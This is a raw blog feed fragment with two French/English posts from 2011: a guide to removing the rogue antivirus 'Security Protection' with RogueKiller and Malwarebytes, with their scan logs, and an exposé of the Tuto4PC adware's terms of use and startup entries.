&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;Comment supprimer Security Protection&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;How to get rid of Security Protection&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-W_kLsWoVi7w/TglyEw5ZtgI/AAAAAAAAADA/FzUtNEovK5M/s1600/MSREmovalTool.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-m9zZE_L7tcY/TircITnlFGI/AAAAAAAAADw/FojZDHMXUns/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="467" src="http://1.bp.blogspot.com/-m9zZE_L7tcY/TircITnlFGI/AAAAAAAAADw/FojZDHMXUns/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #3d85c6;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/xAExGtLyGzc/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/xAExGtLyGzc?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;

&lt;param name="bgcolor" value="#FFFFFF" /&gt;

&lt;embed width="600" height="375"  src="http://www.youtube.com/v/xAExGtLyGzc?f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Télécharger et lancer &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; en mode 2 (Suppression) -- Download and start &lt;a href="http://www.sur-la-toile.com/RogueKiller/"&gt;RogueKiller&lt;/a&gt; with mode 2 (Delete)&lt;/li&gt;
&lt;li&gt;Si le rogue empêche le lancement du programme -- If you're unable to launch the program&lt;/li&gt;
&lt;/ul&gt;
&lt;ol&gt;
&lt;li&gt; Si les associations de fichiers ne sont pas activées:  Renommer en "winlogon" ou "firefox". Sinon renommer en winlogon.exe ou  firefox.exe (rajouter l'extension .exe) -- If the file associations are  not set: Rename as "winlogon" or "firefox", else rename it with the .exe  extension (firefox.exe or winlogon.exe) &lt;/li&gt;
&lt;li&gt;Essayer de lancer à nouveau le programme -- Try again to start the program&lt;/li&gt;
&lt;/ol&gt;
&lt;ul&gt;
&lt;li&gt;Vous devriez avoir le rapport suivant -- You should obtain the following report&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;RogueKiller V5.2.7 [30/06/2011] par Tigzy&lt;br /&gt;
contact sur http://www.sur-la-toile.com&lt;br /&gt;
mail: tigzyRK&amp;lt;at&amp;gt;gmail&amp;lt;dot&amp;gt;com&lt;br /&gt;
Remontees: http://www.sur-la-toile.com/discussion-193725-1-BRogueKillerD-Remontees.html&lt;br /&gt;
&lt;br /&gt;
Systeme d'exploitation: Windows XP (5.1.2600 Service Pack 3) 32 bits version&lt;br /&gt;
Demarrage : Mode normal&lt;br /&gt;
Utilisateur: tigzy [Droits d'admin]&lt;br /&gt;
Mode: Suppression -- Date : 23/07/2011 16:34:38&lt;br /&gt;
&lt;br /&gt;
Processus malicieux: 1&lt;br /&gt;
[SUSP PATH] defender.exe -- c:\documents and settings\all users\application data\defender.exe -&amp;gt; KILLED&lt;br /&gt;
&lt;br /&gt;
Entrees de registre: 1&lt;br /&gt;
[SUSP PATH] HKCU\[...]\Run : Security Protection (C:\Documents and Settings\All Users\Application Data\defender.exe) -&amp;gt; DELETED&lt;br /&gt;
&lt;br /&gt;
Fichier HOSTS:&lt;br /&gt;
127.0.0.1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
::1&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; localhost&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Termine : &amp;lt;&amp;lt; RKreport[4].txt &amp;gt;&amp;gt;&lt;br /&gt;
RKreport[1].txt ; RKreport[2].txt ; RKreport[3].txt ; RKreport[4].txt&lt;br /&gt;
&lt;br /&gt;
&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Ensuite passer un scan avec &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt; -- Then do a scan with &lt;a href="http://www.malwarebytes.org/mbam-download.php"&gt;Malwarebytes&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote style="color: #444444;"&gt;
&lt;span style="font-size: x-small;"&gt;Malwarebytes' Anti-Malware 1.51.1.1800&lt;br /&gt;www.malwarebytes.org&lt;br /&gt;&lt;br /&gt;Version de la base de données: 7249&lt;br /&gt;&lt;br /&gt;Windows 5.1.2600 Service Pack 3&lt;br /&gt;Internet Explorer 6.0.2900.5512&lt;br /&gt;&lt;br /&gt;23/07/2011 16:41:06&lt;br /&gt;mbam-log-2011-07-23 (16-41-06).txt&lt;br /&gt;&lt;br /&gt;Type d'examen: Examen rapide&lt;br /&gt;Elément(s) analysé(s): 137963&lt;br /&gt;Temps écoulé: 1 minute(s), 33 seconde(s)&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s): 0&lt;br /&gt;Module(s) mémoire infecté(s): 0&lt;br /&gt;Clé(s) du Registre infectée(s): 0&lt;br /&gt;Valeur(s) du Registre infectée(s): 0&lt;br /&gt;Elément(s) de données du Registre infecté(s): 0&lt;br /&gt;Dossier(s) infecté(s): 0&lt;br /&gt;Fichier(s) infecté(s): 5&lt;br /&gt;&lt;br /&gt;Processus mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Module(s) mémoire infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Clé(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Valeur(s) du Registre infectée(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Elément(s) de données du Registre infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Dossier(s) infecté(s):&lt;br /&gt;(Aucun élément nuisible détecté)&lt;br /&gt;&lt;br /&gt;Fichier(s) infecté(s):&lt;br /&gt;c:\documents and settings\tigzy\Bureau\securityprotection.exe (Trojan.Agent) -&amp;gt; Not selected for removal.&lt;br /&gt;c:\documents and settings\tigzy\local settings\Temp\1.tmp (Trojan.Agent) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\Temp\2.tmp (Trojan.Agent) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\tigzy\local settings\Temp\3.tmp (Trojan.Agent) -&amp;gt; Quarantined and deleted successfully.&lt;br /&gt;c:\documents and settings\all users\application data\defender.exe (Trojan.FakeAlert) -&amp;gt; Quarantined and deleted successfully.&lt;/span&gt;&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Le rogue devrait être supprimé -- The rogue should have been deleted &lt;/li&gt;
&lt;/ul&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/iwUXLRuaCQ4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/5245631825766388667/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2011/07/rogue-security-protection.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5245631825766388667?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5245631825766388667?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/iwUXLRuaCQ4/rogue-security-protection.html" title="[Rogue] Security Protection" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-m9zZE_L7tcY/TircITnlFGI/AAAAAAAAADw/FojZDHMXUns/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2011/07/rogue-security-protection.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DU8FQXw8eSp7ImA9WhRTFEU.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-1664052489803884239</id><published>2011-07-16T15:33:00.000-07:00</published><updated>2011-11-05T03:10:10.271-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-11-05T03:10:10.271-07:00</app:edited><title>[Adware] Tuto4PC / PCTuto -- Le nouvel adware d'Eorezo</title><content type="html">&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-ejxk0acfa7E/TiIN6cyzVrI/AAAAAAAAADI/gvGU7qZ5HN4/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Un petit post qui change des rogues et autres rootkit pour dénoncer un état d'esprit plus que douteux selon moi, celui deTuto4PC (ou PCTuto). Ce site propose "gratuitement" de télécharger des tutos animés, mais installe un adware sur le PC de l'utilisateur afin de monétiser tout ça et rentabiliser leurs tutoriels.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Si vous vous êtes fait avoir par cet adware, merci de venir en parler ici : &lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.commentcamarche.net/faq/32334-victimes-de-tuto4pc-faites-vous-entendre"&gt;http://www.commentcamarche.net/faq/32334-victimes-de-tuto4pc-faites-vous-entendre&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Cette société possède un partenariat avec 01net, qui propose le tutoriel dans un lien connexe au lien de téléchargement des logiciels. Si vous êtes mécontents d'avoir été dupés par cet adware, je vous invite à venir l'exprimer dans les avis d'utilisateurs (sur le tuto, pas sur le logiciel en lui même qui n'y est pour rien)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-JPZQy7T2XU4/ToqenFqxaUI/AAAAAAAAAEE/PcOgZvghFIg/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="507" src="http://4.bp.blogspot.com/-JPZQy7T2XU4/ToqenFqxaUI/AAAAAAAAAEE/PcOgZvghFIg/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;&lt;span style="font-size: small;"&gt;MAJ du 04/10/2011: &lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Suite au lien ci-dessus, commentcamarche.net a été assigné en justice par notre cher éditeur d'adwares&amp;nbsp; (on se demande bien pour quel motif). L'audience est prévue ce jeudi, nous aurons les résultats dans les jours qui suivent. &lt;/span&gt;&lt;span style="font-size: small;"&gt;commentcamarche.net &lt;/span&gt;&lt;span style="font-size: small;"&gt;a préféré retiré l'article par précaution avant le jugement.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://lamaredugof.fr/blog/2011/10/dtc-judiciarisation-des-espaces-d-entraide-informatique/"&gt;&lt;span style="font-size: small;"&gt;http://lamaredugof.fr/blog/2011/10/dtc-judiciarisation-des-espaces-d-entraide-informatique/&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://korben.info/tuto4pc.html%20"&gt;http://korben.info/tuto4pc.html &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a href="http://www.pcinpact.com/actu/news/66141-tuto4pc-commentcamarche-sebsauvage-refere.htm?vc=1"&gt;&lt;span style="font-size: small;"&gt;http://www.pcinpact.com/actu/news/66141-tuto4pc-commentcamarche-sebsauvage-refere.htm?vc=1&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://fr.news.yahoo.com/tuto4pc-attaque-commentcamarche-net-101534958.html"&gt;http://fr.news.yahoo.com/tuto4pc-attaque-commentcamarche-net-101534958.html &lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;--------&lt;/span&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
En réalité, &lt;u&gt;tout est inscrit dans les CGU&lt;/u&gt; (&lt;i&gt;vous savez, les lignes que personne ne lit -a tort-&lt;/i&gt;). Analyse.&lt;br /&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Tout d'abord, sur leur site (où on télécharge l'exécutable) WOT voit rouge.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-_u2RGSeNADo/TiINg5LZ14I/AAAAAAAAADE/NIkhoJBeVu8/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="416" src="http://1.bp.blogspot.com/-_u2RGSeNADo/TiINg5LZ14I/AAAAAAAAADE/NIkhoJBeVu8/s640/Capture.PNG" width="640" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt; Voici quelques extraits des CGU:&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="text-align: center;"&gt;
&amp;nbsp;&lt;a href="http://1.bp.blogspot.com/-ejxk0acfa7E/TiIN6cyzVrI/AAAAAAAAADI/gvGU7qZ5HN4/s1600/Capture2.PNG" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://1.bp.blogspot.com/-ejxk0acfa7E/TiIN6cyzVrI/AAAAAAAAADI/gvGU7qZ5HN4/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;br /&gt;
&lt;br /&gt;
- Les informations sur l'utilisateur seront communiquées à des partenaires commerciaux&lt;br /&gt;
et utilisées par ces derniers (pour de la pub) -&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-Vvrf0ZgMBlY/TiIPVZ6CnnI/AAAAAAAAADM/DsII83oypIg/s1600/Capture3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://4.bp.blogspot.com/-Vvrf0ZgMBlY/TiIPVZ6CnnI/AAAAAAAAADM/DsII83oypIg/s640/Capture3.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- L'utilisateur va recevoir du SPAM par SMS -&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- Idem qu'au dessus, les infos de l'utilisateur (tel portable, etc...) seront communiquées à des partenaires commerciaux -&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Le numéro de teléphone est communiqué à l'installation si l'utilisateur ne comprend pas que la page suivante n'est pas obligatoire:&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-4aeDlzeqUSs/TiIQg0o1afI/AAAAAAAAADk/iKzP4GfxMI8/s1600/Capture7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="460" src="http://2.bp.blogspot.com/-4aeDlzeqUSs/TiIQg0o1afI/AAAAAAAAADk/iKzP4GfxMI8/s640/Capture7.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-SFsPWHXOTpA/TiIPV4UjYNI/AAAAAAAAADQ/pnDmuYyHUig/s1600/Capture4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="492" src="http://2.bp.blogspot.com/-SFsPWHXOTpA/TiIPV4UjYNI/AAAAAAAAADQ/pnDmuYyHUig/s640/Capture4.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- L'utilisateur va recevoir de la pub sur son PC -&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
Dès l'installation finie, ça commence:&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-BKUsIIM6k5c/TiIPyEeGgiI/AAAAAAAAADc/Pv9rMRthesU/s1600/Capture10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="376" src="http://1.bp.blogspot.com/-BKUsIIM6k5c/TiIPyEeGgiI/AAAAAAAAADc/Pv9rMRthesU/s640/Capture10.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-vO759Y6xYB0/TiIPWVlMn3I/AAAAAAAAADU/oN63T2OcTsA/s1600/Capture5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://3.bp.blogspot.com/-vO759Y6xYB0/TiIPWVlMn3I/AAAAAAAAADU/oN63T2OcTsA/s640/Capture5.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- Les paramètres du navigateur sont modifiées pour lo.st -&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="color: red;"&gt;-L'utilisateur accepte l'installation AUTOMATIQUE des logiciels de Tuto4Pc group et de sociétés tierces. En gros, n'importe qui peut installer n'importe quoi sur le PC via le processus résident. C'est là le comportement type d'un &lt;b&gt;Trojan Downloader (Cheval de Troie)&lt;/b&gt; -&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-BpLuhNn9COY/TiIQA03yxFI/AAAAAAAAADg/a956wEZx_5k/s1600/Capture8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="380" src="http://4.bp.blogspot.com/-BpLuhNn9COY/TiIQA03yxFI/AAAAAAAAADg/a956wEZx_5k/s640/Capture8.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-Vpp8Uk_Lq00/TiIPWkJKxjI/AAAAAAAAADY/iWn27ZFBugE/s1600/Capture6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="494" src="http://1.bp.blogspot.com/-Vpp8Uk_Lq00/TiIPWkJKxjI/AAAAAAAAADY/iWn27ZFBugE/s640/Capture6.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- Le logiciel collecte des données personnelles, et les envoi à un serveur pour une "étude statistique". Autrement dit, il a un comportement de spyware (sauf que c'est écrit dans les CGU, que personne ne lit)&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
- La société (règle 9) ne répondra à aucune réclamation, et se dédouane de tout dommage causé au Pc de l'utilisateur après installation du logiciel. Pratique. -&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;ul&gt;
&lt;li&gt;Une fois toutes ces péripéties passées, on voit (enfin) apparaitre le tuto animé. Encore selon moi, ça ne vaut pas un vrai tutoriel fait par un site digne de ce nom.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-6tJYWSdtAH0/TiIShTRkuCI/AAAAAAAAADo/RaYRIjxg-0k/s1600/Capture9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="529" src="http://4.bp.blogspot.com/-6tJYWSdtAH0/TiIShTRkuCI/AAAAAAAAADo/RaYRIjxg-0k/s640/Capture9.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Au niveau système, les lignes suivantes apparaissent dans le scan hijack this (la ligne lo.st n'apparait pas mais elle y est):&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;ul&gt;&lt;/ul&gt;
&lt;div style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&lt;span style="font-size: small;"&gt;O2 - BHO: T4PCBHO - {AB720781-0670-4e46-B82E-376AEF228F25} - C:\Program Files\Tuto4pc\Tuto4pcBHO.dll&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace;"&gt;
&lt;span style="font-size: small;"&gt;O4 - HKLM\..\Run: [Tuto4pc] "C:\Users\tigzy\AppData\Roaming\Tuto4pc\Tuto4pc\tuto4pc.exe"&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: &amp;quot;Courier New&amp;quot;,Courier,monospace; font-size: small;"&gt;O4 - HKLM\..\RunOnce: [UpdateTuto4PCHP] C:\Users\tigzy\AppData\Roaming\Tuto4pc\Tuto4pc\UpdateTuto4PCHP.exe -runonce&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons donc une dll chargée dans une BHO, qui va analyser le trafic internet et envoyer les infos (voir CGU) à Tuto4PC. Nous avons également le programme et son updater qui vont être lancés à chaque démarrage, et pomper inutilement les ressources de l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&amp;gt;------------&amp;lt;&lt;/div&gt;
&lt;ul&gt;&lt;/ul&gt;
&lt;b&gt;En conclusion, ne vous faites pas avoir. Il existe des dizaines de sites proposant des tutoriels gratuits, sans aucune monétisation, et avec le seul but de voir les gens évoluer et proposer également des choses bien, basées sur la communauté.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Pour exemple:&lt;/u&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Le site du Zéro: &lt;a href="http://www.siteduzero.com/"&gt;http://www.siteduzero.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Developpez.com : &lt;a href="http://www.developpez.com/"&gt;http://www.developpez.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;CCM: &lt;a href="http://www.commentcamarche.net/%20"&gt;http://www.commentcamarche.net/ &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Tuts4you (spécialisé, en anglais) : &lt;a href="http://tuts4you.com/download.php"&gt;http://tuts4you.com/download.php&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
Bref, il suffit de chercher. Les tutos sous forme de page web sur des forums seront de bien meilleures factures, car souvent il est possible de poser des questions sur le forum, ou contacter l'auteur. Et surtout cela ne va pas dans la poche d'une entreprise côtée en bourse.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Quelques liens relatifs à Tuto4Pc:&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.malekal.com/2011/07/09/pctutotuto4pc-association-avec-01net/"&gt;http://www.malekal.com/2011/07/09/pctutotuto4pc-association-avec-01net/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://streisand.me/tuto4pc.htm"&gt;http://streisand.me/tuto4pc.htm &lt;/a&gt;&lt;br /&gt;
&lt;a href="http://sebsauvage.net/rhaa/index.php?2011/07/05/07/58/09-c-est-chatouilleux-la-bourse"&gt;http://sebsauvage.net/rhaa/index.php?2011/07/05/07/58/09-c-est-chatouilleux-la-bourse&amp;nbsp;&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.pcinpact.com/actu/news/64648-cgu-sebsauvage-tuto4pc-eorezo-adware.htm"&gt;http://www.pcinpact.com/actu/news/64648-cgu-sebsauvage-tuto4pc-eorezo-adware.htm &lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.malekal.com/2011/07/07/quand-les-avocats-refont-le-web/"&gt;http://www.malekal.com/2011/07/07/quand-les-avocats-refont-le-web/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.01net.com/editorial/535749/un-bloggeur-menace-de-proces-par-tuto4pc-diffuseur-d-adwares/"&gt;http://www.01net.com/editorial/535749/un-bloggeur-menace-de-proces-par-tuto4pc-diffuseur-d-adwares/&lt;/a&gt;&lt;br /&gt;
